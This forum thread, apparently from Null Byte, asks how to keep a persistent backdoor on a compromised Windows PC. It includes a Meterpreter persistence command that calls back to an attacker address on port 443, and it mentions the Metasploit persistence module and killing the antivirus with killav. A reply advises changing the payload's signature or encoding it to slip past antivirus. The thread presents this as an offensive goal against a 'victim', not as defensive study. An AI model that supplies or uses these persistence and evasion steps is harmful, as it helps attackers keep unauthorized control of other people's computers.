Forum Thread: Best Approach to Persistent Backdoor?

Hello fellow Null Byters!

I have been trying for a while to set up a persistent backdoor, but to no avail. After studying the topic, I was thinking of 3 different approaches:

  • Meterpreter's Persistence command
  • The Persistence exploit (exploit/windows/local/persistence)
  • Netcap

I tried to use the persistence command in a compromised computer after escalating my privileges. I set the following:

meterpreter> run persistence -A -L c:\\ -X -p443 -r 192.168.1.40

Everything seems to run smoothly, but meter won't start the second session it is supposed to. Instead, when I check the victim PC, this is what I found:

I tried killing the AV with killav since I thought that the AV (AVG) could have picked it up. I had the same problem.

So I wondered, has anyone tried the Persistence exploit? I can't seem to figure this one out quite well since it doesn't give you the option to set host or port.

Do you think netcap would be the better solution to have a persistent backdoor? This would basically mean that I would have to install netcap on the victim first though, right?

Cheers and thank you for the feedback!

3 Responses

Have you looked at the backdoor code?
If you can code, then change the signature to trick the AV, or encode it.

Well, that is assuming that the problem is indeed with the AV detecting the payload. Since it's a regular reverse TCP, that's what I am expecting. I will encode the payload generated by the Persistence script and post the results. Thanks anyway!
